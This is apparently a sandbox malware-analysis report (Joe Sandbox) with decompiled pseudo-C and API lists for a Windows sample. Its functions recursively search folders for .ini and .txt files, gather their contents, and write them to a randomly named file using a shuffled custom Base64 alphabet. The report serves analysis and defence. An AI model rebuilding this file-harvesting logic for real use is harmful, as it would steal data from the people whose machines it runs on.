                          • API ID: Crypt$Hash$ContextHeapParam$AcquireAllocateCreateDataDestroyProcessRelease
                          • String ID:
                          • API String ID: 3570522263-0
                          • Opcode ID: 8e75188814708d47d836c8b09bba4f5841bf54efd30f8e84128d3e9e686a1209
                          • Instruction ID: ef6af617f85f5d4d7a5f652b4d984f3ca2167124cb42a2bf24775b3e161fb78f
                          • Opcode Fuzzy Hash: 8e75188814708d47d836c8b09bba4f5841bf54efd30f8e84128d3e9e686a1209
                          • Instruction Fuzzy Hash: 97317C71205350AFE7219F26DC09F6B7BAAFF84B50F004829F948D62A0D770DD01DBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 516 6f5710-6f572f 517 6f5734-6f573f 516->517 518 6f575d-6f5769 517->518 519 6f5741-6f574c 517->519 521 6f57ff-6f5804 518->521 522 6f576f-6f5774 518->522 519->517 520 6f574e-6f5758 519->520 523 6f58b9 520->523 525 6f580b-6f580f 521->525 524 6f577b-6f577f 522->524 530 6f58bb-6f58c5 523->530 526 6f578c 524->526 527 6f5781-6f5785 524->527 528 6f581c 525->528 529 6f5811-6f5815 525->529 533 6f578e-6f579b 526->533 527->524 531 6f5787 527->531 534 6f581e-6f582b 528->534 529->525 532 6f5817 529->532 531->523 532->523 535 6f579d-6f57a6 533->535 536 6f57b3-6f57c0 533->536 537 6f582d-6f5836 534->537 538 6f5840-6f5846 534->538 535->533 539 6f57a8-6f57ae 535->539 541 6f57c5-6f57c9 536->541 537->534 540 6f5838-6f583e 537->540 542 6f584b-6f5856 538->542 539->523 540->523 545 6f57cb-6f57cf 541->545 546 6f57d6 541->546 543 6f5858-6f5863 542->543 544 6f5871-6f587d 542->544 543->542 548 6f5865-6f586f 543->548 550 6f5887-6f588b 544->550 545->541 547 6f57d1 545->547 549 6f57d8-6f57e1 546->549 547->523 548->523 551 6f57f9 549->551 552 6f57e3-6f57ec 549->552 553 6f588d-6f5893 550->553 554 6f5897 550->554 551->521 552->549 555 6f57ee-6f57f4 552->555 553->550 556 6f5895 553->556 557 6f5899-6f58a6 554->557 555->523 556->530 558 6f58a8-6f58b1 557->558 559 6f58c6-6f58e5 FindFirstFileW 557->559 558->557 560 6f58b3 558->560 561 6f5a9b-6f5a9d 559->561 562 6f58eb-6f58fb 559->562 560->523 563 6f598e-6f5996 562->563 564 6f599c-6f599e 563->564 565 6f5a71-6f5a88 FindNextFileW 563->565 568 6f59c3-6f59cf 564->568 569 6f59a0-6f59a2 564->569 566 6f5a8a-6f5a8c 565->566 567 6f5a92-6f5a95 FindClose 565->567 566->563 566->567 567->561 575 6f5a6b 568->575 576 6f59d5-6f59df lstrcmpiW 568->576 570 6f59a6-6f59ac 569->570 571 6f59ae-6f59ba 570->571 572 6f59f9-6f5a05 570->572 571->570 574 6f59bc-6f59be 571->574 572->565 577 6f5a07-6f5a0f 572->577 574->565 575->565 576->575 578 6f59e5-6f59f7 call 6f5710 576->578 579 6f5a19-6f5a1b 577->579 580 6f5a11-6f5a17 577->580 578->575 583 6f5a1c-6f5a26 579->583 582 6f5a40-6f5a43 580->582 582->575 584 6f5a45-6f5a4c 582->584 586 6f5a28-6f5a34 583->586 587 6f5a36-6f5a3d 583->587 588 6f5a52-6f5a5d 584->588 589 6f5900-6f590a 584->589 586->583 586->587 587->582 588->565 590 6f5a5f-6f5a63 588->590 589->565 591 6f5910-6f592a call 6e3180 589->591 590->591 593 6f5a69 590->593 591->565 595 6f5930-6f597e call 6ec400 call 6e1200 call 6f7410 call 6ec430 591->595 593->565 595->565 604 6f5984-6f598c Sleep 595->604 604->574
                          C-Code - Quality: 86%
                          			E006F5710() {
                          				void* _t96;
                          				void** _t97;
                          				void* _t98;
                          				signed int _t99;
                          				void* _t101;
                          				signed char _t104;
                          				int _t106;
                          				void** _t112;
                          				signed short _t113;
                          				void* _t115;
                          				void* _t122;
                          				void* _t125;
                          				signed int _t127;
                          				signed int _t128;
                          				signed int _t129;
                          				signed int _t130;
                          				void* _t131;
                          				void* _t132;
                          				signed int _t133;
                          				void** _t134;
                          				intOrPtr* _t136;
                          				signed short* _t137;
                          				signed short* _t139;
                          				signed short* _t140;
                          				void** _t144;
                          				void* _t145;
                          				void* _t146;
                          				signed int _t147;
                          				void* _t148;
                          				void* _t151;
                          				void* _t153;
                          				void** _t154;
                          				void* _t155;
                          				signed int _t157;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				signed int _t161;
                          				void* _t165;
                          				signed int _t168;
                          				signed int _t169;
                          				WCHAR* _t170;
                          				void* _t171;
                          				void** _t172;
                          				void** _t173;
                          
                          				_t155 = _t172[0x29e];
                          				_t96 = _t172[0x29d];
                          				_t146 = _t172[0x29c];
                          				_t131 = 0xfffffc00;
                          				while(1) {
                          					_t157 =  *(_t146 + _t131 + 0x400) & 0x0000ffff;
                          					if(_t157 == 0) {
                          						break;
                          					}
                          					 *(_t172 + _t131 + 0x65c) = _t157;
                          					_t131 = _t131 + 2;
                          					if(_t131 != 0) {
                          						continue;
                          					}
                          					 *((short*)(_t172 + _t131 + 0x65a)) = 0;
                          					L42:
                          					return 0;
                          				}
                          				 *(_t172 + _t131 + 0x65c) = 0;
                          				if(_t96 == 0) {
                          					L22:
                          					_t132 = 0x200;
                          					_t97 =  &(_t172[0x97]);
                          					while( *_t97 != 0) {
                          						_t97 =  &(_t97[0]);
                          						_t132 = _t132 - 1;
                          						if(_t132 != 0) {
                          							continue;
                          						}
                          						goto L42;
                          					}
                          					_t158 = 0;
                          					while(1) {
                          						_t147 = _t158;
                          						_t34 = _t158 + 0x6f9c1c; // 0x5c
                          						_t159 =  *(_t158 + _t34) & 0x0000ffff;
                          						if(_t159 == 0) {
                          							break;
                          						}
                          						 *(_t97 + _t147 * 2) = _t159;
                          						_t37 = _t147 + 1; // 0x1
                          						_t158 = _t37;
                          						if(_t132 != _t158) {
                          							continue;
                          						}
                          						 *(_t97 + _t147 * 2) = 0;
                          						goto L42;
                          					}
                          					 *(_t97 + _t147 * 2) = 0;
                          					_t98 = 0xfffffc00;
                          					while(1) {
                          						_t133 =  *(_t172 + _t98 + 0x65c) & 0x0000ffff;
                          						if(_t133 == 0) {
                          							break;
                          						}
                          						 *(_t172 + _t98 + 0xa5c) = _t133;
                          						_t98 = _t98 + 2;
                          						if(_t98 != 0) {
                          							continue;
                          						}
                          						 *((short*)(_t172 + _t98 + 0xa5a)) = 0;
                          						goto L42;
                          					}
                          					_t134 =  &(_t172[0x97]);
                          					_t148 = 0x200;
                          					 *(_t172 + _t98 + 0xa5c) = 0;
                          					while( *_t134 != 0) {
                          						_t134 =  &(_t134[0]);
                          						_t148 = _t148 - 1;
                          						if(_t148 != 0) {
                          							continue;
                          						}
                          						return 0;
                          					}
                          					_t160 = 0;
                          					while(1) {
                          						_t99 = _t160;
                          						_t52 = _t160 + 0x6f9ba4; // 0x2a005c
                          						_t161 =  *(_t160 + _t52) & 0x0000ffff;
                          						if(_t161 == 0) {
                          							break;
                          						}
                          						 *(_t134 + _t99 * 2) = _t161;
                          						_t55 = _t99 + 1; // 0x1
                          						_t160 = _t55;
                          						if(_t148 != _t160) {
                          							continue;
                          						}
                          						 *(_t134 + _t99 * 2) = 0;
                          						goto L42;
                          					}
                          					 *(_t134 + _t99 * 2) = 0;
                          					_t101 = FindFirstFileW( &(_t172[0x97]),  &(_t172[3])); // executed
                          					 *_t172 = _t101;
                          					if(_t101 == 0xffffffff) {
                          						L75:
                          						return 1;
                          					}
                          					_t136 =  *0x6f9d94;
                          					_t170 =  &(_t172[0xe]);
                          					do {
                          						_t104 = _t172[3].dwFileAttributes;
                          						_t125 = 0;
                          						if((_t104 & 0x00000002) != 0) {
                          							goto L72;
                          						}
                          						if((_t104 & 0x00000010) != 0) {
                          							_push(0x6f9aa4);
                          							_push(_t170);
                          							if( *_t136() != 0 && lstrcmpiW(_t170, 0x6f9c3a) != 0) {
                          								_push(_t155);
                          								_push(_t170);
                          								_push( &(_t172[0x199]));
                          								E006F5710();
                          								_t172 =  &(_t172[3]);
                          							}
                          							L71:
                          							goto L72;
                          						}
                          						_t171 = 0;
                          						_t112 =  &(_t172[0xd]);
                          						while( *(_t172 + _t171 + 0x38) != 0) {
                          							_t171 = _t171 + 2;
                          							_t112 =  &(_t112[0]);
                          							if(_t171 != 0x400) {
                          								continue;
                          							}
                          							L55:
                          							_t125 = 0;
                          							goto L72;
                          						}
                          						_t137 = _t172 + _t171 + 0x36;
                          						_t125 = 0;
                          						if(_t137 <=  &(_t172[0xe])) {
                          							goto L72;
                          						}
                          						_t125 = 0;
                          						if(( *_t137 & 0x0000ffff) != 0x2e) {
                          							_t151 = 1;
                          							while(1) {
                          								_t165 = _t151;
                          								_t139 = _t112;
                          								if(_t139 <=  &(_t172[0xe])) {
                          									break;
                          								}
                          								_t89 = _t165 + 1; // 0x2
                          								_t151 = _t89;
                          								_t112 = _t139 - 2;
                          								if(( *_t139 & 0x0000ffff) != 0x2e) {
                          									continue;
                          								}
                          								break;
                          							}
                          							_t155 = _t172[0x29e];
                          							_t140 =  &(_t139[1]);
                          							L66:
                          							if(_t165 != 3) {
                          								goto L71;
                          							}
                          							_t113 =  *_t140;
                          							if(_t113 == 0x6e0069) {
                          								if(_t140[2] != 0x69) {
                          									goto L72;
                          								}
                          								L47:
                          								_t64 = _t171 + 2; // 0x2
                          								_t172[3].dwFileAttributes = _t64;
                          								_t115 = E006E3180(_t64, 0);
                          								_t172 =  &(_t172[2]);
                          								_t125 = 0;
                          								_t172[1] = _t115;
                          								if(_t115 == 0) {
                          									goto L72;
                          								}
                          								E006EC400(_t115,  &(_t172[0xf]), _t172[2]);
                          								_t173 =  &(_t172[3]);
                          								 *((short*)(_t173[1] + _t171)) = 0;
                          								E006E1200( *_t155,  &(_t173[1]));
                          								E006F7410( &(_t173[0x199]),  &(_t172[0xf]), _t155);
                          								_t172 =  &(_t173[3]);
                          								_t122 = E006EC430( *((intOrPtr*)(_t155 + 8)));
                          								_t125 = 1;
                          								if(_t122 > 0x10000) {
                          									goto L72;
                          								}
                          								Sleep(0x64);
                          								goto L55;
                          							}
                          							if(_t113 != 0x780074) {
                          								goto L72;
                          							}
                          							if(_t140[2] == 0x74) {
                          								goto L47;
                          							}
                          							goto L72;
                          						}
                          						_t140 = _t172 + _t171 + 0x38;
                          						_t165 = 0;
                          						goto L66;
                          						L72:
                          						_t106 = FindNextFileW(_t172[1],  &(_t172[3])); // executed
                          						_t136 =  *0x6f9d94;
                          						_t170 =  &(_t172[0xe]);
                          					} while (_t125 == 0 && _t106 != 0);
                          					FindClose( *_t172);
                          					goto L75;
                          				}
                          				_t153 = 0x200;
                          				_t144 =  &(_t172[0x97]);
                          				while( *_t144 != 0) {
                          					_t144 =  &(_t144[0]);
                          					_t153 = _t153 - 1;
                          					if(_t153 != 0) {
                          						continue;
                          					}
                          					goto L42;
                          				}
                          				_t127 = 0;
                          				while(1) {
                          					_t168 = _t127;
                          					_t14 = _t127 + 0x6f9c1c; // 0x5c
                          					_t128 =  *(_t127 + _t14) & 0x0000ffff;
                          					if(_t128 == 0) {
                          						break;
                          					}
                          					 *(_t144 + _t168 * 2) = _t128;
                          					_t17 = _t168 + 1; // 0x1
                          					_t127 = _t17;
                          					if(_t153 != _t127) {
                          						continue;
                          					}
                          					 *(_t144 + _t168 * 2) = 0;
                          					goto L42;
                          				}
                          				 *(_t144 + _t168 * 2) = 0;
                          				_t154 =  &(_t172[0x97]);
                          				_t145 = 0x200;
                          				while( *_t154 != 0) {
                          					_t154 =  &(_t154[0]);
                          					_t145 = _t145 - 1;
                          					if(_t145 != 0) {
                          						continue;
                          					}
                          					goto L42;
                          				}
                          				_t129 = 0;
                          				while(1) {
                          					_t169 = _t129;
                          					_t130 =  *(_t96 + _t129 * 2) & 0x0000ffff;
                          					if(_t130 == 0) {
                          						break;
                          					}
                          					 *(_t154 + _t169 * 2) = _t130;
                          					_t27 = _t169 + 1; // 0x1
                          					_t129 = _t27;
                          					if(_t145 != _t129) {
                          						continue;
                          					}
                          					 *(_t154 + _t169 * 2) = 0;
                          					goto L42;
                          				}
                          				 *(_t154 + _t169 * 2) = 0;
                          				goto L22;
                          			}

                          APIs
                          • FindFirstFileW.KERNELBASE(?,?), ref: 006F58D9
                          • Sleep.KERNEL32(00000064,?,?,?), ref: 006F5986
                          • lstrcmpiW.KERNEL32(?,006F9C3A), ref: 006F59DB
                          • FindNextFileW.KERNELBASE(?,?), ref: 006F5A7A
                          • FindClose.KERNEL32 ref: 006F5A95
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNextSleeplstrcmpi
                          • String ID:
                          • API String ID: 2811834920-0
                          • Opcode ID: 058f17470b0d8f60bb598675081ce0032cef52631d9bc6ee5293648055a8dd6d
                          • Instruction ID: 81679e3e3df590c0fc9b3bb425b44d8ff1b12ae33036824789d9f9ae697bff9b
                          • Opcode Fuzzy Hash: 058f17470b0d8f60bb598675081ce0032cef52631d9bc6ee5293648055a8dd6d
                          • Instruction Fuzzy Hash: 0C91FF21904B18DBD734AB24D8846BAB3E7FF80314F64892DE7578B3A1E7719C46C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 79%
                          			E006EA4D0(signed int __edx) {
                          				intOrPtr _t115;
                          				intOrPtr _t116;
                          				void* _t117;
                          				intOrPtr _t119;
                          				intOrPtr _t121;
                          				signed int _t123;
                          				signed int _t132;
                          				signed int _t136;
                          				intOrPtr _t144;
                          				intOrPtr _t146;
                          				void* _t149;
                          				intOrPtr _t150;
                          				intOrPtr _t151;
                          				signed short* _t152;
                          				void* _t154;
                          				intOrPtr _t155;
                          				intOrPtr _t157;
                          				void* _t159;
                          				void* _t163;
                          				void* _t166;
                          				signed int _t172;
                          				signed int _t178;
                          				signed short* _t184;
                          				intOrPtr _t185;
                          				signed int _t187;
                          				char _t190;
                          				signed int _t196;
                          				char _t201;
                          				intOrPtr _t202;
                          				void* _t203;
                          				signed int* _t204;
                          				intOrPtr _t205;
                          				signed int* _t206;
                          				intOrPtr _t212;
                          				signed int _t218;
                          				void* _t220;
                          				void* _t222;
                          				intOrPtr _t223;
                          				void* _t228;
                          				void* _t247;
                          				WCHAR* _t254;
                          				intOrPtr _t256;
                          				intOrPtr _t257;
                          				intOrPtr _t258;
                          				void* _t262;
                          				struct _SECURITY_ATTRIBUTES* _t266;
                          				void* _t273;
                          				intOrPtr _t276;
                          				intOrPtr* _t278;
                          				intOrPtr _t280;
                          				intOrPtr _t281;
                          				intOrPtr _t282;
                          				void* _t284;
                          				void* _t285;
                          				void* _t287;
                          				void* _t288;
                          				void* _t289;
                          				void* _t290;
                          				void* _t291;
                          				void* _t292;
                          				void* _t294;
                          				intOrPtr* _t295;
                          				void* _t296;
                          				intOrPtr* _t298;
                          				void* _t299;
                          				intOrPtr* _t300;
                          				intOrPtr* _t301;
                          				void* _t302;
                          				void* _t303;
                          				void* _t304;
                          				void* _t305;
                          				void* _t306;
                          				intOrPtr* _t307;
                          				void* _t318;
                          
                          				_t234 = __edx;
                          				_t278 =  *((intOrPtr*)(_t288 + 0x548));
                          				if(E006EC430( *_t278) == 0) {
                          					L2:
                          					_t254 = _t288 + 0x130;
                          					E006F4520(_t254, 0x6c);
                          					_t288 = _t288 + 8;
                          					L3:
                          					_t115 =  *0x6f9b40; // 0x319000
                          					if(_t115 != 0) {
                          						E006E91E0(_t115);
                          						_t288 = _t288 + 4;
                          					}
                          					_t116 = E006EB7A0(_t254);
                          					_t289 = _t288 + 4;
                          					_t266 = 0;
                          					 *0x6f9b40 = _t116;
                          					_t117 = CreateFileW(_t254, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
                          					 *(_t289 + 4) = _t117;
                          					if(_t117 == 0xffffffff) {
                          						L34:
                          						return _t266;
                          					} else {
                          						_t267 =  *((intOrPtr*)(_t278 + 0xc));
                          						if( *((intOrPtr*)(_t278 + 0xc)) != 0) {
                          							E006E1EA0(_t267);
                          							L006F7400(_t267);
                          							_t289 = _t289 + 4;
                          						}
                          						_t119 = E006E5140(0x10);
                          						_t290 = _t289 + 4;
                          						E006E61A0(_t119, 4, 0x400);
                          						 *((intOrPtr*)(_t278 + 0xc)) = _t119;
                          						_t269 =  *((intOrPtr*)(_t278 + 0x10));
                          						if( *((intOrPtr*)(_t278 + 0x10)) != 0) {
                          							E006E1EA0(_t269);
                          							L006F7400(_t269);
                          							_t290 = _t290 + 4;
                          						}
                          						_t121 = E006E5140(0x10);
                          						_t291 = _t290 + 4;
                          						E006E61A0(_t121, 4, 0x4000);
                          						 *((intOrPtr*)(_t278 + 0x10)) = _t121;
                          						_t123 = E006E8160(_t234);
                          						_t201 = 0;
                          						_t19 =  ~((_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) + (_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) * 8) + 2; // 0x2
                          						_push(_t278);
                          						_push(0);
                          						_push(_t123 + _t19);
                          						_push( *((intOrPtr*)(_t291 + 0x10)));
                          						E006E8A20(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe);
                          						_t292 = _t291 + 0x10;
                          						_t280 = E006E8160(_t123 * 0x38e38e39 >> 0x00000020 >> 0x00000001 & 0xfffffffe) - (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						_t132 = E006E8160(_t129 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
                          						 *((intOrPtr*)(_t292 + 0xc)) = _t280;
                          						_t212 = _t132 - (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						_t35 = _t280 + 4; // 0x4
                          						 *((intOrPtr*)(_t292 + 0x24)) = _t212;
                          						 *((intOrPtr*)(_t292 + 0x10)) = _t212 + _t35;
                          						_t136 = E006E8160(_t132 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe);
                          						_t246 = _t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe;
                          						_t318 =  *0x6f9a80 - _t201; // 0x30f490
                          						 *((intOrPtr*)(_t292 + 8)) = _t136 - (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) + (_t136 * 0xcccccccd >> 0x00000020 >> 0x00000002 & 0xfffffffe) * 4;
                          						if(_t318 != 0) {
                          							L14:
                          							_t281 =  *((intOrPtr*)(_t292 + 0xc)) + 3;
                          							 *((intOrPtr*)(_t292 + 0x28)) =  *((intOrPtr*)(_t292 + 8)) +  *((intOrPtr*)(_t292 + 0x10)) + 1;
                          							do {
                          								 *((char*)(_t292 + _t201 + 0x230)) = _t201;
                          								_t201 = _t201 + 1;
                          							} while (_t201 != 0x100);
                          							_push( *0x6f9a80);
                          							_push(_t292 + 0x330);
                          							_push(0x100);
                          							_push(_t292 + 0x230);
                          							_t144 = E006E7400(_t292 + 0x330, E006EB110());
                          							_t294 = _t292 + 0x18;
                          							_t202 = _t144;
                          							 *((intOrPtr*)(_t294 + 0x2c)) = 0;
                          							_t256 =  *((intOrPtr*)(_t294 + 0x54c));
                          							_t146 = E006E3CF0(_t294 + 0x2c, _t246, _t256, _t294 + 0x2c);
                          							_t295 = _t294 + 8;
                          							_t266 = 0;
                          							 *_t295 = _t146;
                          							if(_t146 == 0) {
                          								L30:
                          								_t247 =  *(_t295 + 4);
                          								L33:
                          								CloseHandle(_t247);
                          								goto L34;
                          							}
                          							_t216 =  *((intOrPtr*)(_t295 + 0x2c));
                          							if( *((intOrPtr*)(_t295 + 0x2c)) == 0) {
                          								goto L30;
                          							}
                          							 *((intOrPtr*)(_t295 + 0x1c)) = _t202;
                          							 *((intOrPtr*)(_t295 + 0x20)) = _t281;
                          							_t203 =  *(_t295 + 0xc);
                          							_t149 = E006F2E00( *(_t295 + 0xc), _t216, _t146);
                          							_t296 = _t295 + 0xc;
                          							if(_t149 == 0) {
                          								_t247 = _t203;
                          								goto L33;
                          							}
                          							_t150 = E006E3180(0x100, 0);
                          							_push(_t256);
                          							_t257 = _t150;
                          							_push(_t150);
                          							_push(0xa);
                          							_push(6);
                          							_t151 = E006F2C70(_t150, _t246);
                          							_t298 = _t296 + 0x18;
                          							_t282 = _t151;
                          							 *_t298 = _t151;
                          							_t152 = E006E3EB0();
                          							_t247 = _t203;
                          							if(_t152 == 0) {
                          								goto L33;
                          							}
                          							 *_t298 = 0;
                          							 *((intOrPtr*)(_t298 + 0x18)) = _t257;
                          							_t204 = _t298 + 0x30;
                          							_t266 = 0;
                          							_t258 = 0;
                          							_t218 =  *_t152 & 0x0000ffff;
                          							 *((intOrPtr*)(_t298 + 0x14)) = _t282 + _t257;
                          							if(_t218 == 0) {
                          								L24:
                          								_t284 = _t298 + 0x130;
                          								E006F7160(_t284, 0x6d);
                          								_t299 = _t298 + 8;
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push( *((intOrPtr*)(_t299 + 0x14)));
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push( *((intOrPtr*)(_t299 + 0x28)));
                          								_push(_t284);
                          								_push(0x80);
                          								_push(_t204);
                          								_t154 = E006EF0E0();
                          								_t300 = _t299 + 0x1c;
                          								_t155 = _t154 + _t258;
                          								 *_t300 = _t155;
                          								_push( *0x6f9a80);
                          								_push( *((intOrPtr*)(_t300 + 0x18)));
                          								_push(_t155);
                          								_push(_t300 + 0x3c);
                          								_t157 = E006EB110();
                          								_t301 = _t300 + 0x10;
                          								 *_t301 = _t157;
                          								_t262 =  *(_t301 + 0xc);
                          								_t159 = E006F2E00(_t262,  *((intOrPtr*)(_t301 + 0x18)),  *((intOrPtr*)(_t300 + 0x18)) + _t157 -  *((intOrPtr*)(_t301 + 0x18)));
                          								_t302 = _t301 + 0xc;
                          								if(_t159 == 0) {
                          									_t247 = _t262;
                          									goto L33;
                          								}
                          								_t205 =  *((intOrPtr*)(_t302 + 0x548));
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t302 + 0xc)) + 2);
                          								_push(0);
                          								_push(_t262);
                          								E006E8A20(_t247);
                          								_t303 = _t302 + 0x10;
                          								_t163 = E006E98C0();
                          								_t247 = _t262;
                          								if(_t163 == 0) {
                          									goto L33;
                          								}
                          								_t220 = 0;
                          								while( *((short*)(_t163 + _t220)) != 0) {
                          									_t220 = _t220 + 2;
                          									if(_t220 != 0x400) {
                          										continue;
                          									}
                          									_t266 = 0;
                          									goto L33;
                          								}
                          								_t273 = _t247;
                          								E006EAFA0(_t220, _t247, _t247, _t163, _t220, _t205);
                          								_t304 = _t303 + 0x10;
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t304 + 0x28)));
                          								_push(0);
                          								_t285 = _t273;
                          								_push(_t273);
                          								E006E8A20(_t247);
                          								_t305 = _t304 + 0x10;
                          								_t166 = E006E81B0();
                          								if(_t166 == 0) {
                          									_t266 = 0;
                          									L44:
                          									_t247 = _t285;
                          									goto L33;
                          								}
                          								_t222 = 0;
                          								_t247 = _t285;
                          								while( *((short*)(_t166 + _t222)) != 0) {
                          									_t222 = _t222 + 2;
                          									_t266 = 0;
                          									if(_t222 != 0x400) {
                          										continue;
                          									}
                          									goto L33;
                          								}
                          								E006EAFA0(_t222, _t247, _t247, _t166, _t222, _t205);
                          								_t306 = _t305 + 0x10;
                          								_t266 = 0;
                          								_push(_t205);
                          								_push( *((intOrPtr*)(_t306 + 0xc)));
                          								_push(0);
                          								_push(_t247);
                          								E006E8A20(_t247);
                          								_t307 = _t306 + 0x10;
                          								_t223 =  *0x6f9bd4; // 0x2ef510
                          								 *_t307 = 0;
                          								if(E006E1B50(_t223, _t307) == 0) {
                          									goto L44;
                          								}
                          								_t224 =  *_t307;
                          								_t247 = _t285;
                          								if( *_t307 != 0) {
                          									E006EAFA0(_t224, _t247, _t247, _t170, _t224, _t205);
                          									_t172 = E006E8160(_t247);
                          									_t104 =  ~((_t172 * 0xcccccccd >> 0x20 >> 2) + (_t172 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
                          									_push(_t205);
                          									_push(_t172 + _t104);
                          									_push(0);
                          									_push(_t285);
                          									E006E8A20(_t172 * 0xcccccccd >> 0x20 >> 2);
                          									_t178 = E006E8160(_t172 * 0xcccccccd >> 0x20 >> 2);
                          									_t112 =  ~((_t178 * 0xcccccccd >> 0x20 >> 2) + (_t178 * 0xcccccccd >> 0x20 >> 2) * 4) + 1; // 0x1
                          									_push(_t205);
                          									_push(0);
                          									_push(_t178 + _t112);
                          									_push(_t285);
                          									E006E8A20(_t178 * 0xcccccccd >> 0x20 >> 2);
                          									_t247 = _t285;
                          									_t266 = 1;
                          								}
                          								goto L33;
                          							}
                          							_t206 = _t298 + 0x30;
                          							_t184 =  &(_t152[1]);
                          							while(1) {
                          								 *_t206 = _t218;
                          								_t204 =  &(_t206[0]);
                          								_t258 =  *_t298 + 1;
                          								 *_t298 = _t258;
                          								if(_t258 > 0x3f) {
                          									goto L24;
                          								}
                          								_t218 =  *_t184 & 0x0000ffff;
                          								_t184 =  &(_t184[1]);
                          								if(_t218 != 0) {
                          									continue;
                          								}
                          								goto L24;
                          							}
                          							goto L24;
                          						} else {
                          							_t185 = E006E3180(0x40, 0);
                          							_t276 = _t185;
                          							 *0x6f9a80 = _t185;
                          							E006EC400(_t185, "HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT", 0x40);
                          							_t292 = _t292 + 0x14;
                          							_t287 = 0;
                          							goto L12;
                          							do {
                          								do {
                          									L12:
                          									_t187 = E006E8160(_t246);
                          									_t246 = _t187 * 0x38e38e39 >> 0x20 >> 1;
                          									_t228 = _t187 - (_t187 * 0x38e38e39 >> 0x20 >> 1) + (_t187 * 0x38e38e39 >> 0x20 >> 1) * 8;
                          								} while (_t228 == _t287);
                          								_t246 =  *((intOrPtr*)(_t276 + _t228 + 0x37));
                          								_t190 =  *((intOrPtr*)(_t276 + _t287 + 0x37));
                          								 *((char*)(_t276 + _t287 + 0x37)) =  *((intOrPtr*)(_t276 + _t228 + 0x37));
                          								_t287 = _t287 + 1;
                          								 *((char*)(_t276 + _t228 + 0x37)) = _t190;
                          							} while (_t287 != 9);
                          							goto L14;
                          						}
                          					}
                          				}
                          				_t196 = E006E8160(__edx);
                          				_t234 = _t196 % E006EC430( *_t278);
                          				_t254 =  *(E006E42F0( *_t278, _t196 % E006EC430( *_t278)));
                          				if(_t254 != 0) {
                          					goto L3;
                          				}
                          				goto L2;
                          			}

                          APIs
                          • CreateFileW.KERNELBASE(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 006EA558
                            • Part of subcall function 006E8160: GetTickCount.KERNEL32(?,?,?,006E9394), ref: 006E8169
                          • CloseHandle.KERNEL32(?), ref: 006EA897
                          Strings
                          • HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT, xrefs: 006EA675
                          Memory Dump Source
                          • Source File: 00000003.00000002.541878315.006E1000.00000020.00000001.sdmp, Offset: 006E0000, based on PE: true
                          • Associated: 00000003.00000002.541873241.006E0000.00000002.00000001.sdmp
                          • Associated: 00000003.00000002.541894547.006F8000.00000004.00000001.sdmp
                          • Associated: 00000003.00000002.541901024.006FA000.00000002.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e0000_______.jbxd
                          Similarity
                          • API ID: CloseCountCreateFileHandleTick
                          • String ID: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o12467MEDyzQjT
                          • API String ID: 1536596348-2016521663
                          • Opcode ID: 4883bedb5dc9802f50af9c34860104bd32c99116f4d5f17edacc7ad52655f08a
                          • Instruction ID: 4ab51f6e81a23b8ab6edbf4d2106ee52525bb83ed3e6568794badab251499d88
                          • Opcode Fuzzy Hash: 4883bedb5dc9802f50af9c34860104bd32c99116f4d5f17edacc7ad52655f08a
                          • Instruction Fuzzy Hash: A1D148B1A053446FD761AF669C42BBB77DBEF84704F05452CF9498B382EA30AD06C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [Control-flow graph for function E006EC7C0 (entry block 6ec7c0): rendered graph omitted; basic blocks and edges not reproduced. API calls present in the graph: FindFirstFileW (block 6ec866-6ec887), FindNextFileW (block 6eca9f-6eca8), FindClose (block 6ecab2-6ecab5). Subcalls present in the graph: 6e3180, 6ec510, 6e91e0.]
                          C-Code - Quality: 98%
                          			E006EC7C0() {
                          				void* _t70;
                          				void** _t71;
                          				void* _t73;
                          				void* _t74;
                          				int _t75;
                          				void* _t77;
                          				void* _t78;
                          				void* _t79;
                          				signed int _t81;
                          				void* _t83;
                          				intOrPtr _t84;
                          				short* _t86;
                          				signed short* _t88;
                          				void* _t90;
                          				signed int _t92;
                          				void* _t93;
                          				void* _t94;
                          				void* _t95;
                          				void** _t96;
                          				signed int _t97;
                          				void* _t98;
                          				void* _t101;
                          				signed short* _t102;
